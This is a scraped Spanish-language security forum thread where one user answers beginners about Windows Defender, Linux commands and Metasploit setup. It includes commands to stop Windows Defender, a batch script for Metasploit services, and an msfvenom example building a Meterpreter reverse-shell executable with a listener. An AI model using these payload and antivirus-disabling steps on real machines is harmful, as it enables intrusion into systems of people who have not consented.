@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

CitarColocando repetidores/expansores.

No es cierto esto, ya que va dependiendo de los aparatos electronicos como por ejemplo: microondas, ya que estas pueden causar interferencia.

Tambien depende de que este construido las paredes ya que si es yeso o madera, no creo que disminuya notablemente la intensidad.

Tambien depende de la transmision de 2.4GHZ/5.8GHZ ya que la de 2.4GHZ puede transmitir la intensidad mucho mas lento pero puede traspasar las paredes fácilmente, la de 5.8GHZ puede ser mas rapida notablemente pero hay una posibilidad mayor de que no traspase las paredes facilmente como la haria la anterior y tambien si hay aparatos electronicos puede causar problemas incluso de conexion algo que dificilmente pasaria con la de 2.4GHZ.

Si colocas expansores innecesariamente no solo estarias incrementando la intensidad a tu casa, incluso a las casas de tus vecinos eso haria facil el trabajo de un atacante.

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Como te indica @solid water debes crear una carpeta llamada 'html' en /var/www que basicamente es el directorio raiz de apache

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

En esta pagina te indica como controlarlo por medio de lineas de comandos (Lo que no estoy seguro es que solo funcione para versiones anteriores ya que antes windows defender tenia el nombre/alias de Microsoft Protection Command line) pero puedes probar haber: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Hola, como en la imagen te indica debes instalar los paquetes que te indica usando los comandos:

apt-get update
apt-get upgrade
apt-get install <paquete>

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Aveces esas claves en el editor de registro no se crean naturalmente, tienes que crearla tu mismo (OJO: No quiere decir que no vaya o si vaya a funcionar, tambien depende del sistema operativo, etc).

Que deseas hacer?, controlarlo por medio de lineas de comandos o habilitarlo/deshabilitarlo?

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Recuerda que con las maquinas virtuales hay un problema en instalar los drivers de las tarjetas de redes ya sea internas o externas, hay muchos videos en youtube (O otra pagina web, pero ese es la que mas se acerca a solucionar problemas de este tipo) donde te enseñan como solucionar estos problemas.

Aqui unos videos pero no te aseguro:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (Recomiendo a este tipo: HEL)
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Quieres activarlo?, si es asi sigue estos pasos:

1.- Abre la consola de comandos de Windows con privilegios administrativos
2.- Coloca este comando: net start "Windows Defender"

Se abrirá el servicio de este.

Si quieres activar y configurar Windows Defender, solo abre tu buscador y coloca windows defender, click y te aparecera su interfaz

Nota: No necesariamente el servicio se llama "Windows Defender" ya que puede tener otro.

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Los atacantes tipicamente colocan su malware/ruta de este, en donde el sistema operativo ejecute programas internos/externos al iniciar.

También por servicios, inyecciones, suplantaciones de los mismos programas (Este puede equivaler a una inyeccion de un programa, cuando el usuario ejecuta este también ejecuta el malware), remotamente (Mas que todo con exploits, acceso remoto o ejecucion de comandos remoto).

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Si lo que deseas es deshabilitar 'Windows Defender', tendras que ganar privilegios y apagar el servicio de este con el siguiente comandos: net stop "Servicio de Windows Defender".

Si no funciona es por que el servicio se llama diferente, te lo digo porque si no me equivoco en windows 7 (Ya que lo que te mostre arriba esta probado en Windows 8 es "Windows Defender". Tendras que investigar.

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

CitarBuenas comunidad , como ven ando practiando usar metasploit y ya he tenido algunas informaciones. Pero me pasa un problema con algunos auxiliares como arp_wepp y ahora me pasa con el scanner de puertos scanner/syn. No me deja utilizar estos modulos. Me sale un error. Aqui se los dejo..

Sobre el problema, te lo indica en la misma consola de metasploit que hace falta el archivo 'c:/metasploit-framework/lib/ruby/gems/2.3.0/pcaprub-0.13.0/lib/pcaprub_c.so', Deteniendo la ejecución correcta del modulo.

Citarotra duda es es mejor nessus u openvas.

Te recomiendo que leas el articulo de esta pagina web: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Significa que el dominio que trataste de ingresar no existe, por lo tanto no podrás ingresar. lol 

Quisistes decir: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Esta vez si cargara pero te dara un error 404.

Posiblemente colocaste un atributo llamado encode (Si colocaste este sirve para codificar un texto, ej: "Hola Mundo".encode("base64")), y el atributo/función no acepta este atributo.

Deberias mandar un screenshot y el código (Por lo menos una parte del código. La linea de donde se encuentre el error).

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Un tip:

Cuando esos servicios de metasploit estan en ejecucion, pueden relentizar el rendimiento de tu pc, recomiendo si no vas a usar metasploit desactivalos.

Estos son los servicios que crea y utiliza metasploit:

Metasploit Pro Service
Metasploit Thin Service
Metasploit Worker
metasploitPostgreSQL

Para desactivarlo puedes crear un bat:

@echo off

:menu

color a

cls

title Elige uno.

echo 1-. iniciar servicios de metasploit framework
echo 2-. apagar servicios de metasploit framework
echo 99-. cerrar esta ventana de comandos

:loop

set /p var=">>>"

if not defined var goto loop
if ("%var%") == ("1") goto iniciar
if ("%var%") == ("2") goto apagar
if ("%var%") == ("99") goto salir

echo Error, no se reconocio ninguna orden, vuelva a intentarlo.
echo ATENCION: PRESIONE UNA TECLA PARA PODER CONTINUAR ...

pause > nul

goto menu

:iniciar

title Iniciando servicios de metasploit framework ...

net start "Metasploit Pro Service"
net start "Metasploit Thin Service"
net start "Metasploit Worker"
net start "metasploitPostgreSQL"

title Saliendo y cerrando la ventana de ordenes.

ping localhost -n 5 > nul

goto salir

:apagar

title Apagando servicios de metasploit framework ...

net stop "Metasploit Pro Service"
net stop "Metasploit Thin Service"
net stop "Metasploit Worker"
net stop "metasploitPostgreSQL"

title Saliendo y cerrando la ventana de ordenes.

ping localhost -n 5 > nul

goto salir

:salir

exit

OJO: Solo lo desactivas en tal caso de que no vayas a usar metasploit

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Ando leyendo en un curso y hay comandos como : "Cat" o "pwd". Entre en internet y veo que son comandos para linux. ¿En windows va estos comandos tambien?

En windows, son parecidos en las funciones (En la mayoria de casos), cat es equivalente a type en windows (Su función es ver el contenido de un archivo), pwd es equivalente a cd en windows (Su función es ver la ruta actual)

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Te dire algunos comandos basicos:

Consola de metasploit:

use <modulo> :: Es para seleccionar un modulo de metasploit y usarlo.
reload :: recarga los modulos en tal caso de que se haya agregado un modulo y la consola estuvo abierta
search <coincidencia del modulo o modulo> :: Busca una coincidencia de un modulo cargado de metasploit
set <parametro> :: ajusta un valor de un parametro
show <parametro> :: muestra alguna opcion como puede ser un payload, exploit, auxiliar, etc. EJ: show payloads
options :: lo mismo que que show options
run o exploit :: una vez ajustado todas las opciones, arrancas o inicias el exploit

MSFVenom:

-p <payload> :: selecciona una carga útil de la lista de payloads
-h, --help :: ver la ayuda
LHOST=<tu direccion ip/nombre del host/dns/etc> :: LHOST (Local HOST) Tu direccion para establecer una conexion entre metasploit y la carga util
LPORT=<tu puerto local> :: Establece el puerto donde recibiras la conexion
-f <formato de la carga útil> :: El formato de la carga util por ejemplo: raw. Generara una carga util dependiendo de la extension del archivo usando el parametro con -o, si en tal caso no se especifica una extension se usara el formato de un ejecutable de windows
-o <nombre del archivo a generar> :: Nombre de la carga util, si no se especifica el -f y colocas el nombre por ejemplo: .exe, .ps1 se creara con ese formato. En tal caso de que sea lo contrario y especificas -f por ejemplo: -f exe y colocas en el parametro -o .ps1, .txt, etc, se creara con esa extension pero con el formato exe (un ejecutable de windows)

Aqui una lista de payloads disponibles (OJO: no se si esta actualizada), con el mismo msfvenom puedes ver la lista (Pero no recuerdo el parametro :/): You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Un ejemplo de comandos que se usuarian en una prueba de penetracion:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.2 LPORT=4445 -f raw -o payload.exe
msfconsole
use exploit/multi/handler
set lhost 192.168.2.2
set lport 4445
set payload windows/meterpreter/reverse_tcp
exploit

Si deseas hablar mas sobre el tema, escribeme en privado (con gusto respondere dependiendo de mis conocimientos) ya que este tema esta solucionado.

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Citar¿que diferencia tiene venom y console?

MetaSploit Framework Console (MSFConsole): Es la consola o mejor dicho, la suite de metasploit para controlar las pruebas de penetración.

MetaSploit Framework Venom (MSVenom): Como te mencione anteriormente en los comentarios, es una herramienta de metasploit que se encarga de generar cargas utiles (malware/virus que dispone a hacer una acción del atacante) en ejecutables de muchos formatos.

CitarSobre Los cursos

En mi opinión irrelevante para muchos, no es necesario que veas cursos/libros/etc de metasploit, ya que hay cantidades extravagantes de información en la web. Fácilmente usa tu buscador para encontrar una duda que tengas sobre metasploit o por lo menos busca los comandos basicos y veras que te hara mas simple el uso de este mismo.

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Citar¿una vez iniciado tengo que abrir esos bats para entrar a consola desde el metasploit ya iniciado?

No, lo que me refería con esos archivos de secuencia de comandos, es que hay herramientas que están como interconectadas con metasploit, agrego, para generar una carga útil de un formato ejecutable donde puedas obtener una sesión necesitas msfvenom (Una herramienta de metasploit para generar cargas útiles ejecutables, ej: generar un archivo malicioso para windows llamado: nomeejecutesquesoyunvirus.exe).

Citarno me aparece ningún ejecutable en el buscador para iniciar Metasploit.

Deberia aparecerte. En tal caso de que no, solo ve a la ruta donde lo instalastes y ejecuta el archivo de secuencias de comandos console.bat.

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Claro que te va a detectar que es un virus ya que es un herramienta de explotación donde contiene multitud de cargas útiles, exploits, etc, hasta el anti virus con menos funciones lo detectaría. Esta bien que hayas desactivado el AV.

Para ejecutarlo en tal caso de que lo hayas hecho en windows, solo coloca en el buscador metasploit, click en "metasploit - console" y tendras que esperar un rato (de verdad cuando te digo un rato es que esperes algo de tiempo, por lo tanto tendras que ser paciente, aunque tambien depende de las características de tu dispositivo), se te abrira una ventana de comandos, al principio no te aparecera nada, a los cinco minutos aprox. te indicara "Starting de metasploit framework ..." (o algo parecido) y esperas a que cargue.

En linux (distribuciones), solo ejecuta el siguiente comando, una vez instalado: "msfconsole" y empezara a cargar.

Recomendaciones si lo usaras en windows:

*- Aprende a como usarlo antes de ejecutarlo: ya que si en tal caso esperas 1 hora aprox. a que cargue por lo menos no tendras que perder otro tiempo en aprender.
*- Si tu dispositivo no tiene caracteristicas notables o extrabagantes solo cierra las aplicaciones y programas que estes usando.
*- Para ejecutar las demas herramientas de metasploit solo debes dirigirte a la ruta de donde lo instalastes: ej: "c:\metasploit". msfconsole en windows es (console.bat) msfvenom es (msfvenom.bat), etc.

Recomendaciones en linux:

*- Aqui es mas sencillo, solo ejecuta esas herramientas en cualquier ruta y listo.

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Citar¿el pentestbox tiene un lenguaje distinto o siempre son iguales al otro metasploit?

No se a que referencia tratas de hacer con un lenguaje distinto. Si en tal caso te refieres al lenguaje de programación en que esta creado metasploit es ruby, sin embargo tiene algunas utilidades, exploits, etc de distintos lenguajes, Si te refieres si cambiara la funcionalidad si la uso en una distribucion u otra, No, sera por igual en la mayoría de cosas.

Citarmetasploit pro tiene alguna version gratuita.

Si no me equivoco la misma pagina de rapid7 hay una versión pro gratuita por un periodo de tiempo determinado.

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Con tan poca RAM complicado... hoy en día los sistemas operativos (por norma general), consumen más...

Has pensado en utilizar linux? hay distros bastante ligeras.

Es cierto lo que dice @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, recomiendo que instales windows 7 con tus características, te ira optimizado.